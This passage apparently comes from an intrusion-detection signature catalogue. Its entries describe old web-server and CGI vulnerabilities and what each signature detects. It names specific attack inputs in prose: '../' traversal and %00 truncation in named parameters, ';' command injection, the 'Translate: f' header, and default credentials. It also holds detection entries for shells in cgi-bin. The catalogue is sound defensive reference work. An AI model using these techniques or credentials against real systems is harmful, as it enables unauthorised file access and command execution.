files are then fed back to frames in the browser. It is possible for an unauthenticated user to view these data files before
they are purged.
Signature ID: 173
WEB-CGI printenv access vulnerability
30
Signature Description: The /cgi-bin/printenv.pl program is a small perl routine which, when invoked, returns the CGI
Environment Variables set on the server upon which it was invoked. This code can be used to retrieve all of the CGI
Environment Variables and print them out (while testing the code) and must not be available on server except at
development of the website . This script gives an attacker valuable information about the configuration of your web
server, allowing him to focus his attacks.
Signature ID: 174
WEB-CGI Processit access vulnerability
Nessus: 10649
Signature Description: Pick System's processit.pl CGI script provides an easy HTML form to D3 PICK/Basic program
interface. It contains a vulnerability that allows system environment variables to be viewed by remote users. When a
request is made for an incorrect file or made with no parameters, the CGI script will return environment variables. This
can provide remote users with potentially sensitive data (e.g. script location, SERVER_SOFTWARE,
DOCUMENT_ROOT). The exact versions that are vulnerable are unknown.
Signature ID: 175
Quickstore traversal vulnerability
Signature Description: Quikstore is an ecommerce shopping cart software package from i-Soft. A vulnerability exists
in Quikstore Shopping Cart in Quikstore 2.0 to 2.9.10. A failure to properly validate user-supplied input leads the script
to disclose files not normally available to a remote user. This could include any file on the affected host, including
password files, server configuration information, credit card information, business models, and other sensitive data.
Signature ID: 176
Extent RBS ISP Directory Traversal vulnerability
Signature Description: Extent RBS, is a back-office billing and "Authentication, Authorization and Accounting"
(AAA) solution for Internet Service Providers(ISPs) that provides remote management through the web. Extent
Technologies RBS ISP 2.5 is vulnerable to directory traversal attack. Appending '../' to the 'image' variable in http
requests to port 8002 will enable a user to read any available file with the privileges of the http daemon including credit
card details, username, password etc.
Signature ID: 177
Martin Hamilton ROADS' search.pl Disclosure Vulnerability
Signature Description: The Martin Hamilton ROADS software is a free Internet resource cataloging system, written in
Perl. In Martin Hamilton ROADS 2.3, the 'search.pl' program allows remote attackers to read arbitrary files by
specifying the file name in the form parameter and terminating the file name with a null byte.
Signature ID: 178
Roxen counter module vulnerability
Nessus: 10207
Signature Description: The Roxen Challenger is a web server written in Pike language. In multiple versions of Roxen
Challenger, requesting large counter GIFs consumes huge amount of CPU-time on the server. If the server does not
31
support threads this will prevent the server from serving other clients. Thus, an attacker can launch a denial of service
attack.
Signature ID: 179
Caldera OpenLinux 2.3 rpm_query CGI Vulnerability
Signature Description: Linux is a Unix-like computer operating system. Caldera OpenLinux is a defunct Linux
distribution that was created by the Caldera Systems corporation. The default installation of Caldera OpenLinux 2.3
includes the CGI program rpm_query, which allows remote attackers to determine what packages are installed on the
system. The 'rpm_query' CGI is installed in '/home/httpd/cgi-bin/'. Any user can run this CGI and obtain a listing of the
installed packages with version information. This could be used to determine the vulnerabile software on the server.
Signature ID: 180
Sambar Web Server CGI scripts vulnerability
Sambar Server 4.2 beta 7 for Windows NT and 2000 supports DOS-style batch programs as CGI scripts. A remote
attacker can use any batch file used by the server in the 'cgi-bin' directory to run any valid command-line program with
administrator privileges. This allows the attacker to read, modify, create, or delete any file or directory on the system,
including user accounts, etc. Even if the user hasn't enabled or created any batch files, the software ships with two by
default: 'hello.bat' and 'echo.bat'.
Signature ID: 181
Sambar /cgi-bin/mailit.pl vulnerability
Nessus: 10417
Sambar Server 5.2 is vulnerable due to a demo CGI script called 'mailit.pl'. Eventhough the access to 'mailit.pl' is
restricted to localhost, an attacker can still execute it using a specially crafted POST request. It can be used to relay
mail, to access files on the server and to upload files to the server.
Signature ID: 182
Sambar webserver pagecount file corruption vulnerability
Directory traversal vulnerability in pagecount CGI sample script of Sambar Server 4.4 production to 5.0 beta
4(inclusive) allows remote attackers to overwrite arbitrary files via a .. (dot dot) attack on the page parameter. Files
attacked in this manner will be corrupted. Loss of critical data and a denial of services may occur if system files are
overwritten.
Signature ID: 183
Directory listing through Sambar server search.dll vulnerability
Sambar ISAPI Search utility 'search.dll' in Sambar Server 3.0 to 4.4 Beta 3 (inclusive) allows remote attackers to read
32
arbitrary directories by specifying the directory or invalid values in the 'query' parameter. This allows an attacker to
gain valuable information about the directory structure of the remote host and could reveal the presence of files which
are not intended to be visible. Such information can be used by the attacker in subsequent attacks.
Signature ID: 184
Sambar /session/sendmail vulnerability
Nessus: 10415
It provides a web interface for sending emails. An attacker can send mails to anyone by passing a POST request to
/session/sendmail. As Sambar server does not check the Referer mime field in the header, direct access to the server is
not necessary. Multiple versions may be vulnerable.
Signature ID: 185
Sambar /sysadmin directory vulnerability
Bugtraq: 2255 Nessus: 10416,11493
In Sambar Server 4.1 beta, the default authentication credentials for the administrator account are 'admin' with no
password. Once a remote user has gained knowledge of the path to log into the admin account, it is possible for the user
to login to the server using a http request. The path can be found by exploiting a vulnerable CGI script.
Signature ID: 186
Savant original form CGI access vulnerability
Signature Description: Michael Lamont Savant WebServer is a freeware open source web server for the windows
operating system family. Michael Lamont Savant WebServer 2.1 allows remote attackers to read source code of CGI
scripts. Omitting the HTTP version from a "GET" request for a CGI script to the Savant Web Server discloses the
source code of the script. This can give an attacker valuable information that can be used in subsequent attacks.
Signature ID: 187
WEB-CGI sdbsearch.cgi access vulnerability
Signature Description: Linux is a Unix-like computer operating system. SUSE is a major retail operating system based
on linux kernel, produced in Germany and owned by Novell, Inc. 'Sdbsearch.cgi' in SuSE Linux 6.0-7.2 could allow
remote attackers to execute arbitrary commands by uploading a 'keylist.txt' file that contains filenames with shell
metacharacters, then causing the file to be searched using a '..' in the HTTP referer (from the HTTP_REFERER
variable) to point to the directory that contains the keylist.txt file. Thus a user can execute arbitrary commands with the
privileges of the HTTP server.
Signature ID: 188
WEB-CGI Amaya templates sendtemp.pl directory traversal vulnerability
Signature Description: W3C's Amaya is a WYSIWYG web browser and authoring program. A complement package
called 'templates server' provides the ability to retrieve templates from an apache web server for use in Amaya-based
authoring. One of the scripts used by the W3C templates server for Amaya 1.1 on W3C Amaya 4.3.2 called
33
'sendtemp.pl' is vulnerable to a directory traversal and file retrieval vulnerability. Using this script, an attacker can view
contents of directories outside of the configured template directory with the privileges of the apache web server
process.
Signature ID: 189
Shells in /cgi-bin vulnerability
Signature Description: A shell interpreter is a software for interacting with the computer operating system using
commands to perform specific tasks. The Common Gateway Interface (CGI) is a standard protocol for interfacing
external application software with an information server, commonly a web server. All CGI based services are placed in
a particular folder on the http server. If a shell interpreter is placed in this folder, an attacker can execute any
commands with the privileges of the http server. This signature detects the access to Almquist shell in the CGI
directory.
Signature ID: 190
commands with the privileges of the http server. This signature detects the access to Bourne-Again shell in the CGI
directory.
Signature ID: 191
commands with the privileges of the http server. This signature detects the access to C shell in the CGI directory.
Signature ID: 192
commands with the privileges of the http server. This signature detects the access to Korn shell in the CGI directory.
34
Signature ID: 193
commands with the privileges of the http server. This signature detects the access to TENEX C shell in the CGI
directory.
Signature ID: 194
commands with the privileges of the http server. This signature detects the access to Z shell in the CGI directory.
Signature ID: 195
commands with the privileges of the http server. This signature detects the access to Bourne shell in the CGI directory.
Signature ID: 196
ShopPlus Arbitrary Command Execution vulnerability
Signature Description: Kabotie Software Technologies ShopPlus Cart is an e-commerce software for web stores.
Kabotie Software Technologies ShopPlus Cart 1.0 does not filter certain types of user-supplied input from web requests
via the "file" parameter. Characters like '|' or ';' are treated as valid by the software. This makes it possible for a
malicious user to submit a request which causes arbitrary commands to be executed on the host. The commands will be
executed with the privileges of the webserver process.
Signature ID: 197
Cobalt siteUserMod cgi vulnerability
Signature Description: The Cobalt RaQ is a 1U rackmount server product line developed by Cobalt Networks, Inc.
featuring a modified Red Hat Linux operating system and a proprietary GUI for server management. In Cobalt RaQ 1.1
to 3.0(inclusive), a malicious site administrator of any account on the server can gain 'admin'(root) privileges. The
35
vulnerable CGI program is 'siteUserMod.cgi'. The attacker can then access or modify information pertaining to any
account on the system and remove all logs that record the modifications made by him.
Signature ID: 198
SIX Webboard's generate.cgi vulnerability
Signature Description: SIX-webboard is a Web bulletin board application developed by Sixhead. The Common
Gateway Interface (CGI) is a standard protocol for interfacing external application software with an information server,
commonly a web server. SIX-webboard 2.01 'generate.cgi' CGI program does not filter ".." and "/" from the user input.
This allows malicious users to enter arbitrary values in order to view or retrieve files not normally accessible to them
from the remote host. This can give an attacker valuable information that can be used in subsequent attacks.
Signature ID: 199
Sojourn File Access Vulnerability
Signature Description: Sojourn is a search engine similar to 'Yahoo!'. The Sojourn software includes the ability to
organize a website into categories. These categories can then be accessed via the sojourn.cgi Perl script. Each category
has an associated .txt file based on the category name. The program appends the .txt extension onto the contents of the
'cat' variable. by appending %00 to the end of the requested file, a malicious user can prevent the .txt extension from
being appended to the filename. The Generation Terrorists Designs & Concepts Sojourn 2.0 'sojourn.cgi' program
accepts '../' string in the variable contents. This gives a malicious user read access to any file with the privileges of the
web server.
Signature ID: 200
Spin_client.cgi buffer overrun vilnerability
Nessus: 10393
Signature Description: SpinBox is an ad serving and hosting solution. The Common Gateway Interface (CGI) is a
standard protocol for interfacing external application software with an information server, commonly a web server.
There is a buffer overrun in the 'spin_client.cgi' CGI program, which will allow anyone to execute arbitrary commands
with the same privileges as the web server (root or nobody).
Signature ID: 201
SQLQHit Directory Structure Disclosure vulnerability
Signature Description: Structured Query Language (SQL) is a database computer language designed for the retrieval
and management of data in relational database management systems (RDBMS). Internet Information Server (IIS) is a
popular web server on Microsoft Windows platform. The sqlqhit.asp sample file is used for performing web-based SQL
queries. In Internet Information Services server 4.0 running Index Server 2.0, a malicious user can reveal the path
information, file attributes, and possibly some lines of the file contents by directly calling 'sqlqhit.asp' with a CiScope
parameter set to (1) webinfo, (2) extended_fileinfo, (3) extended_webinfo, or (4) fileinfo.
Signature ID: 202
Thinking Arts ES.One Directory Traversal Vulnerability
36
Signature Description: Thinking Arts is a Devon (UK) based web design company specializing in art related ecommerce websites. Thinking Arts 'ES.One' package is one such solution. Directory traversal vulnerability in 'store.cgi'
in 'Thinking Arts ES.One' 1.0 package allows remote attackers to read arbitrary files via a .. (dot dot) character
sequence in the StartID parameter.
Signature ID: 203
Redhat Stronghold File System Disclosure vulnerability
Signature Description: In RedHat Stronghold 2.3 to 3.0 (inclusive), if a restricted access to the server status report is
not enabled, then a remote attacker can gain access to sensitive system files including the 'httpd.conf' file. Remote
attackers can retrieve these files via a HTTP GET request to (1) stronghold-info or (2) stronghold-status. These urls are
not enabled in the default installation and must be manually enabled for the system to be vulnerable.
Signature ID: 204
Reading CGI script sources using /cgi-bin-sdb vulnerability
Signature Description: Linux is a Unix-like computer operating system. SUSE is a retail operating system based on the
linux kernel, produced in Germany and owned by Novell, Inc. The default configuration of Apache 1.3.12 in SuSE
Linux 6.3 and 6.4 has the directory '/cgi-bin-sdb' as an Alias of '/cgi-bin'. This allows remote attackers to read source
code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/. This can give an attacker
valuable information that can be used in subsequent attacks.
Signature ID: 205
SWC Overflow vulnerability
Nessus: 10493
Signature Description: A web counter or hit counter is a computer software program that indicates the number of
visitors, or hits, a particular webpage has received. The Common Gateway Interface (CGI) is a standard protocol for
interfacing external application software with an information server, commonly a web server. 'Simple Web Counter' is
a web counter cgi written by Ross Thompson. The Simple Web Counter cgi 1.1 an prior is vulnerable to a buffer
overflow when issued a too long value to the 'ctr=' argument. This will allow anyone to execute arbitrary commands
with the same privileges as the web server (root or nobody).
Signature ID: 206
Multiple Vendor test-cgi Directory Listing Vulnerability
Signature Description: A webserver is a computer program that is responsible for accepting HTTP requests and serving
them HTTP responses along with optional data contents such as HTML documents and linked objects. The NCSA
HTTPd was a web server originally developed at the NCSA. The Apache HTTP Server is a well-known webserver
whose code was based on NCSA HTTPd server. NCSA httpd 1.5.2 a and prior, Apache Software Foundation Apache
1.0.5 and prior come with a CGI sample shell script called 'test-cgi' that is located by default in '/cgi-bin' directory. This
script is vulnerable to directory disclosure as it does not properly enclose echo command parameters in quotes. The
echo command expands the '*' charecter to give a directory listing of the specified directory with the privileges of the
web server. This can give an attacker valuable information that can be used in subsequent attacks.
37
Signature ID: 208
Tomcat's /admin is world readable vulnerability
Signature Description: Apache Software Foundation Tomcat is a Servlet container. Tomcat implements the Java
Servlet and the JavaServer Pages (JSP) specifications from Sun Microsystems, providing a "pure Java" HTTP web
server environment for the Java applications. In Apache Software Foundation Tomcat 3.0 and 3.1, the
'/admin/contextAdmin/contextAdmin.html' page can be accessed by anyone. This allows an attacker to add new
contexts to the Tomcat web server, and potentially read arbitrary files on the server with the privileges of the web
server. This can give an attacker valuable information that can be used in subsequent attacks.
Signature ID: 209
Jakarta Tomcat Path Disclosure vulnerability
server environment for the Java applications. In Apache Software Foundation 3.0 and 3.1 under Apache web server,
physical path information of a file is revealed in the error message when a remote attacker requests a URL that does not
exist. This can give an attacker valuable information that can be used in subsequent attacks.
Signature ID: 210
Tomcat's snoop servlet gives too much information vulnerability
server environment for the Java applications. A vulnerability exists in the snoop servlet portion of the Apache Software
Foundation Tomcat 3.0 and 3.1. Sensitive information about file paths, OS information,etc. is revealed in the error
message on requesting a nonexistent '.snp' file. This can give an attacker valuable information that can be used in
subsequent attacks.
Signature ID: 211
ASP/ASA source using Microsoft Translate: f bug vulnerability
Signature Description: Internet Information Services(formerly 'server') is a set of Internet-based services for
webservers using Microsoft Windows platform. Microsoft IIS 5.0 has a dedicated scripting engine for advanced file
types such as ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, processes them
accordingly, and then executes them on the server. It is possible to force the server to send back the source of known
scrip file to the client if the HTTP GET request contains a specialized header with 'Translate: f' at the end of it, and if a
trailing slash '/' is appended to the end of the URL. This can give an attacker valuable information which can be used in
subsequent attacks.
Signature ID: 212
Tarantella TTAWebTop.CGI Arbitrary File Viewing Vulnerability
38
Signature Description: Tarantella Enterprise 3 is a tool for centralized web interface based management of data and
applications for Unix and Linux based distributions. The 'ttawebtop.cgi' is a CGI script included with the Tarantella
Enterprise 3 3.0 to 3.20.0. It does not sufficiently validate input. As a result, using a '../' character sequence it is possible
for a remote user to traverse the directory structure, and view any file that is readable by the webserver process. This
can give an attacker valuable information that can be used in subsequent attacks.
Signature ID: 213
Access to Upload.cgi
Threat Level: Information
Nessus: 10290
Signature Description: The Common Gateway Interface (CGI) is a standard protocol for interfacing external
application software with an information server, commonly a web server. 'Upload.cgi' is a CGI program that is used to
upload files on to a web server. Many such programs having the same name are vulnerable due to insufficient parsing
of input. The vulnerabilities include file upload to arbitrary locations, file upload without authentication,etc. This
signature detects presence of "Upload.cgi".
Signature ID: 214
O'Reilly's Website Pro uploader.exe CGI vulnerability
Signature Description: A computer program that is responsible for accepting HTTP requests from clients and serving
them HTTP responses along with optional data contents is known as a webserver. The Common Gateway Interface
(CGI) is a standard protocol for interfacing external application software with an information server, commonly a web
server. O'Reilly's Website Pro is a webserver. A program 'uploader.exe' is present in the /cgi-win directory of this
server. 'uploader.exe' in versions of O'Reilly's Website pro software before 1.1g allows an attacker to upload arbitrary
CGI programs and then execute them using CGI requests.
Signature ID: 215
WEB-CGI ustorekeeper.pl directory traversal vulnerability
Signature Description: UStorekeeper is an Online Shopping System from Microburst Technologies. Directory traversal
vulnerability exists in ustorekeeper 1.0.1 to 1.8.1 (inclusive) as the script fails to properly validate user-supplied input.
This allows remote attackers to read arbitrary files via a '..' (dot dot) character sequence in the 'file' parameter. The files
are displayed with the privilege level of the webserver user.
Signature ID: 216
View_source CGI Information Disclosure Vulnerability
Signature Description: UNIX is a computer operating system originally developed by a group of AT&T employees at
Bell Labs. Skunkware is a variant of the UNIX Operating System distributed by Santa Cruz Operations(SCO). 'viewsource' is a script included with the httpd package bundled with Skunkware 2.0. A problem with the view-source script
allows access to restricted files remotely. The problem occurs in the handling of '../' (dot dot slash) character sequence
by the view-source script. This allows an attacker to traverse the directory structure on a web server and view any file
that is readable by the webserver process. This can give an attacker valuable information that can be used in subsequent
attacks.
39
Signature ID: 217
OmniHTTPd visadmin exploit vulnerability
server. OmniHTTPD is a web-server offered by Omnicron for the MS Windows platform. OmniHTTPD 1.1 to 2.0
Alpha 1(inclusive) are vulnerable to a denial of service attack. When the "visiadmin.exe" program is executed via CGI
with the argument "user=guest", it creates temporary files until the hard drive fills. The files then need to be manually
removed before anything can be written to the disk.
Signature ID: 218
VirusWall's catinfo BUFFER overflow vulnerability
Signature Description: Interscan Viruswall(Linux) is a Virus scanning software package distributed and maintained by
Trend Micro for the Llinux operating system. It is designed to scan for virus occurances in both incoming and outgoing
traffic via SMTP, FTP, and HTTP at the gateway of the network. A problem with the software package could lead
elevated privileges on the scanning system. The management interface used with the Interscan Viruswall uses several
programs in a cgi directory that contain buffer overflows. Additionally, the http daemon used to execute these programs
runs as root, and does not sufficiently control access to the programs, allowing a user to execute them directly.
Therefore, it is possible for a remote user to exploit buffer overflows in the cgi programs packaged with Interscan
Viruswall, and execute arbitrary commands are root on the system hosting Viruswall.
Signature ID: 219
W3-msql overflow vulnerability
Signature Description: A Computer Database is a structured collection of records or data that is stored in a computer
system. A Relational database management system (RDBMS) is computer software that is based on the relational
model designed for the purpose of managing databases. Mini SQL (mSQL) is a light weight relational database
management system. w3-msql is a cgi-program shipped with Mini-SQL which acts as a web interface for mSQL. In
Hughes Technologies Mini SQL (mSQL) 2.0.11 there are a number of buffer overflow vulnerabilities in w3-msql
program,one of which is exploitable. The exploitable buffer is the content-length field and the stack is overflowed
inside of a scanf() call. As a result, it is possible to execute arbitrary code remotely as the uid of the webserver (usually
nobody).
Signature ID: 220
Way-board CGI Access vulnerability
Signature Description: A message board system is a program that allows people to leave public messages on a website.
Way-Board is a is a popular korean message board system. In Way-Board 2.0, a remote user could gain read access to
known files outside the root directory where Way-Board resides by requesting a known file in a specially crafted URL
that terminates with a '%00' sequence.
40
Signature ID: 221
WebActive world readable log file vulnerability
them HTTP responses along with optional data contents is known as a webserver. WEBactive is an HTTP server by
ITAfrica. The default configuration of WebActive HTTP Server 1.0 stores the web access log file - 'active.log', in the
web root directory. This allows remote attackers to view the logs by directly requesting the page. An attacker may use
this to obtain valuable information about the site including visitor details and popularity information.
Signature ID: 222
Misconfigured Webcart information disclosure vulnerability
Signature Description: WebCart is a web commerce product provided by Mountain Network Systems, Inc. Default
installations of Mountain Network Systems Inc. WebCart 1.0 are vulnerable to information disclosure due to
misconfiguration of access policies. The program writes customer order information in remotely accessible text
files.This information includes credit card details and other sensitive information. This signature detects access to
'/webcart/orders/' file.
Signature ID: 223
'/webcart/carts/' directory.
Signature ID: 224
'/webcart/config/' directory.
Signature ID: 225
'/orders/carts/' file.
41
Signature ID: 226
'/config/clients.txt' file.
Signature ID: 227
'/orders/import.txt' file.
Signature ID: 229
Webdist CGI command execution vulnerability
their 32-bit and 64-bit MIPS architecture workstations and servers. The Common Gateway Interface (CGI) is a
standard protocol for interfacing external application software with an information server, commonly a web server. A
vulnerability exists in the 'webdist.cgi' CGI program as included by Silicon Graphics in their IRIX operating system
versions 5.0 to 6.3 (inclusive). The 'webdist.cgi' CGI program allows remote attackers to execute arbitrary commands
with the privileges of the web server process via shell metacharacters in the 'distloc' parameter.
Signature ID: 231
Buffer overflow vulnerability in WebSitePro webfind.exe
server. O'Reilly's Website Pro is a webserver. Buffer overflow in Webfind CGI program in O'Reilly WebSite
Professional web server 2.3.18 to 2.4.9 (inclusive) allows remote attackers to execute arbitrary as root commands via a
URL containing a long "keywords" parameter.
Signature ID: 232
WEBgais Remote Command Execution Vulnerability
application software with an information server, commonly a web server. WEBgais is a script that provides a web
42
interface to the "gais" (Global Area Intelligent Search) search engine tool developed by WebGAIS Development Team.
Due to improper input checking in WebGAIS 1.0 to 1.0 B2 (inclusive), '/cgi-bin/webgais' script allows a remote
attacker to execute commands at the privilege level of the web server. An attacker can execute commands using the ';'
character due to improper validation of 'query' argument before calling Perl "system" command. The specially crafted
attack packet must include the parameters output=subject and domain=paragraph.
Signature ID: 233
Websendmail Command execution vulnerability
application software with an information server, commonly a web server. WEBgais is a package that provides a web
interface to the "gais" (Global Area Intelligent Search) search engine tool developed by WebGAIS Development Team.
Due to improper input checking in WebGAIS 1.0 to 1.0 B2 (inclusive), 'websendmail' script allows a remote attacker to
execute commands at the privilege level of the web server. An attacker can execute commands in POST method
request using the ';' character, due to improper validation of 'receiver' argument before calling Perl "Open" command.
Signature ID: 234
Vulnerable WebSite pro can reveal the physical path of web directory
server. O'Reilly's Website Pro is a web server. O'Reilly WebSite Professional web server 2.3.18 to 2.4.9 (inclusive)
allows remote attackers to determine the complete absolute directory of web directories via a malformed URL request.
This information is revealed in the HTTP 404 error response from the vulnerable server. This can give an attacker
valuable information which can be used in subsequent attacks.
Signature ID: 236
WebSpeed remote configuration vulnerability
Signature Description: Progress WebSpeed is an Internet Transaction Processing (ITP) web application which allows
for database connectivity and transaction management. The WEbSpeed WSISA Messenger Administration Utility is
remotely accessible from any web browser. In Progress WebSpeed 3.0, this utility displays sensitive web server
statistics and grants capabilities to administer certain functions of the web server, and can be accessed without any
authentication requirements whatsoever. This misconfiguration may lead to a hacker gaining complete control of the
website.
Signature ID: 237
Directory Traversal Vulnerabity in webspirs.cgi
Signature Description: SilverPlatter ERL is system for providing hard disk access to electronic reference library
databases via the Data Exchange Protocol (DXP). the electronic reference library SilverPlatter WebSPIRS is
SilverPlatter's most popular search interface. In SilverPlatter WebSPIRS 3.3.1, a remote attacker can gain read access
to known files outside the directory where SilverPlatter WebSPIRS resides. Requesting a specially crafted URL with
the sp.nextform parameter containing '../' character sequence along with the known file name will disclose the contents
of the requested file. This can give an attacker valuable information which can be used in subsequent attacks.
43
Signature ID: 238
Whois_raw.cgi arbitrary command execution vulnerability
application software with an information server, commonly a web server. WHOIS is a query/response protocol which is
widely used for querying an official database in order to determine the owner of a domain name, an IP address, or an
autonomous system number on the Internet. CdomainFree is a simple CGI Perl scirpt which can be used to gather the
complete whois information for a domain name as well as the availability of a domain name in popular domain
extensions like .com, .net, .org and .edu. A vulnerability in a CGI script called 'whois_raw.cgi' included with
CdomainFree 1.0 to 2.4(inclusive)allows remote malicious users to run any executable already existing on the machine
via shell meta characters in the fqdn parameter.
Signature ID: 239
Windmail.exe CGI access detected vulnerability
Signature Description: GeoCel WindMail is a command-line mailer that can be integrated with perl cgi applications to
create form-mail capability for a website. WindMail 3.0 and prior versions can be used to retrieve files via email and
execute arbitrary commands with the privileges of the webserver. The exact impact of the attack is based on access
restrictions and the mode of WindMail being used.
Signature ID: 241
Wwwboard passwd.txt access vulnerability
Signature Description: The WWWBoard package is a popular web based discussion board by Matt Wright. The
administration area of the WWWBoard package requires a username and password for authentication. WWWBoard
Alpha 2.0 and 2.1 store encrypted passwords in a password file called 'passwd.txt' that is created in the web root
directory. As a result, an attacker may obtain the contents of this file and decode the password to modify the remote
www board.
Signature ID: 242
Wwwwais CGI Access vulnerability
Signature Description: WWWWAIS is a small ANSI C program that acts as gateway between programs that create
indexed catalogs of files and a forms-capable World-Wide Web browser. In wwwwais.c 2.5 c, a remote user supplying
excess input (> 1024 characters) to a GET request can cause a heap overflow. This slow down the affected webserver
causing a denial of service. The remote attacker can execute arbitrary commands with the privilege level of the
webserver user if the attack packet is properly structured. 
Signature ID: 243
YaBB CGI arbitrary file access vulnerability
Signature Description: A message board system is a program that allows people to leave public messages on a website.
YaBB.pl, a web-based bulletin board script, stores board postings in numbered text files. The numbered file name is
44
specified in the call to YaBB.pl in the variable num. Before retrieving the file, YaBB will append a .txt extension to the
value given to num field. Due to input validation problem in YaBB Bulletin Board 9.1.2000, remote attackers can read
arbitrary files via a '..' (dot dot) character sequence as value of num variable. The '.txt' extension can be avoided by
appending %00 to <file>.
Signature ID: 244
SilverStream directory listing vulnerability
Nessus: 10846
Signature Description: The SilverStream Application Server is a comprehensive, J2EE certified platform for building
and deploying enterprise-class Web applications. This product is currently maintained by Novell. If the disable
directory listing option is disabled, any web user is allowed to see the directory contents. This can give an attacker
valuable information which can be used in subsequent attacks.
Signature ID: 246
ServletExec 4.1 ISAPI Physical Path Disclosure vulnerability
Signature Description: ServletExec/ISAPI is a plug-in Java Servlet/JSP engine for Microsoft IIS. It runs with IIS on
Microsoft Windows NT/2000/XP systems. The default configuration of NewAtlanta ServletExec ISAPI 4.1 discloses
the absolute path to the webroot directory when a specially crafted request without a trailing filename is received.The
specially crafted request is made to 'servlet/com.newatlanta.servletexec.JSP10Servlet/'.
Signature ID: 248
Ping.asp based denial of service attack
Nessus: 10968
Signature Description: Active Server Pages (ASP) is Microsoft's server-side script engine for dynamically-generated
web pages. Some versions of the 'ping.asp' program allows a malicious user to launch a ping flood against local
machine or another connected system. This will result in a Denial of Service (DoS) condition.
Signature ID: 249
JServ Cross Site Scripting Vulnerability
Nessus: 10957
Signature Description: Apache JServ consists of two functional components called mod_jserv and a servlet engine.
mod_jserv is an Apache Server module and directs incoming requests for Java Servlets to a servlet engine. The Apache
JServ Protocol (AJP) facilitates communication between the two components. Older versions of JServ (including the
version shipped with Oracle9i App Server v1.0.2) are vulnerable to a cross site scripting attack using a request for a
non-existent .JSP file.
Signature ID: 250
Apache Windows PHP Arbitrary File access and binary execution Vulnerability
Signature Description: PHP is a computer scripting language. A configuration vulnerability exists for PHP.EXE cgi as
shipped with Apache software Foundation Apache 1.3.11 to 1.3.20 for Windows 95/98/NT/2000 platforms. Setting
ScriptAlias for '/php/' to 'c:/php/' creates a security vulnerability. This allows arbitrary files to be read from the host.
The remote user can also run all executables in the PHP directory.
45
Signature ID: 252
Oracle 9iAS mod_plsql cross site scripting vulnerability
Signature Description: The Oracle Application Server is a platform for developing, deploying, and integrating
enterprise applications. This software is produced and marketed by Oracle Corporation. Oracle9i Application Server is
vulnerable to cross-site scripting attack, caused by improper filtering of HTML script tags. A remote attacker could
create a malicious URL link containing embedded script which would be executed in the victim's Web browser within
the security context of the hosting site, once the link is clicked.
Signature ID: 253
Oracle 9iAS mod_plsql Buffer Overflow vulnerability
enterprise applications. This software is produced and marketed by Oracle Corporation. Oracle 9i Application Server
comes with an Apache-based web server and support for environments such as SOAP, PL/SQL, XSQL and JSP. The
PL/SQL Apache module for Oracle 9iAS provides functionality for remote administration of the Database Access
Descriptors and access to help pages. A remotely exploitable buffer overflow exists in the PL/SQL Apache module. A
request for an excessively long help page can cause stack variables to be overwritten. This allows an attacker to execute
arbitrary code. The attacker-supplied code is executed with SYSTEM level privileges on Microsoft Windows systems.
Signature ID: 254
Oracle 9iAS Jsp Source code disclosure vulnerability
enterprise applications. This software is produced and marketed by Oracle Corporation. Oracle 9i Application
Server(9iAS) comes with an Apache-based web server and support for environments such as SOAP, PL/SQL, XSQL
and JSP. Three files are created when a user requests a JSP page: A ‘jsp_StaticText.class’ file, a
‘.class’ file and a ‘.java’ file. In Oracle 9iAS, all these files are stored in ‘/_`pages
directory tree. A user can request a ‘.jsp’ file and then access the corresponding ‘.java’ file
to see it’s source code. This can reveal sensitive information like databases authentication information. Also, a
file called ‘globals.jsa’ is available to users without restriction. Sensitive information including user
names and passwords are stored in this file. Information obtained by attacker can then be used to further attacks.
Signature ID: 255
Oracle 9iAS Java Process Manager vulnerability
and JSP. In Oracle 9i Application Server 1.0.2.x, anonymous users can access sensitive services without authentication
if default settings are used. ‘oprocmgr-service’, which can be used to control Java processes, is one such
service. Using this process, the user can list, start or stop the processes running on the remote host. Stopping a process
can result in a Denial of Service(DoS) condition.
46
Signature ID: 258
Oracle 9iAS Dynamic Monitoring Services vulnerability
and JSP. In Oracle 9i Application Server, if the default settings are used, remote unauthenticated attackers can directly
accesses the Apache HTTP server Dynamic Monitoring Services, which will disclose sensitive information about the
server, resulting in a loss of confidentiality. Information obtained by attacker can then be used in further attacks.
Signature ID: 259
Oracle 9iAS XSQLConfig.xml File disclosure vulnerability
enterprise applications. This software is produced and marketed by Oracle Corporation. Oracle 9iAS includes a
configuration file called ‘XSQLConfig.xml’ . The configuration file contains sensitive information such
as database user names and passwords. If default configuration is used, this file is accessible to remote clients without
any authentication. It is possible for malicious users to access and read the file through a virtual directory. Information
obtained by attacker can then be used in further attacks.
Signature ID: 260
MS Site Server Information disclosure vulnerability
Signature Description: Microsoft Site Server is designed to run on Microsoft Windows NT Server platforms. It
provides a means for users on a corporate intranet to share, publish, and find information. Site Server Commerce
Edition incorporates the same features as well as providing an interface for e-commerce sites to interact and conduct
business with customers and suppliers. Microsoft Site Server 3.0 prior to SP4 has a default user called
‘LDAP_Anonymous’ with a default password as ‘LdapPassword_1’. This user account is
added to the 'Guests' group, and is given the 'Log on locally' privilege. Using this account, an attacker can gain access
to sensitive information on the host. This information can be used in subsequent attacks. This signature detects access
to ‘persmbr/’ directory.
Signature ID: 261
to ‘persmbr/VsTmPr.asp’ file.
47
Signature ID: 262
to ‘persmbr/VsLsLpRd.asp’ file.
Signature ID: 263
to ‘persmbr/VsPrAuoEd.asp’ file. 
Signature ID: 264
Lotus Domino Banner Information Disclosure Vulnerability
Industry ID: CVE-2002-0245 CVE-2002-0408 CVE-2002-0245 Bugtraq: 4049 Nessus: 11009
Signature Description: Lotus Domino is a server product that provides enterprise-grade e-mail and collaboration
capabilities from IBM. When a non existant perl script is requested in Lotus Domino 5.0.9 and prior with
‘NoBanner’ set to 1, the server returns an error message(500) that discloses the physical path of the web
root and the server version information.
Signature ID: 265
IIS 404 error XSS vulnerability
Signature Description: Microsoft Internet Information Server (IIS) is a popular web server package for Windows based
platforms. In IIS 4.0, 5.0 and 5.1, cross-site scripting vulnerability allows remote attackers to execute arbitrary scripts
via a HTTP error page. The default '404' error page returned by IIS uses scripting to output a link to top level domain
part of the url requested. By crafting a special URL it is possible to insert arbitrary script into the page for execution.
The presence of this vulnerability also indicates the presence of multiple vulnerabilities as reported in Microsoft
security bulletin MS02-018 (various remote buffer overflow and cross site scripting attacks).
48
Signature ID: 266
Attempt to check if IIS server has the .HTR ISAPI filter mapped
platforms. Buffer overflow in the ‘ism.dll’ ISAPI extension that implements HTR scripting in IIS 4.0 and
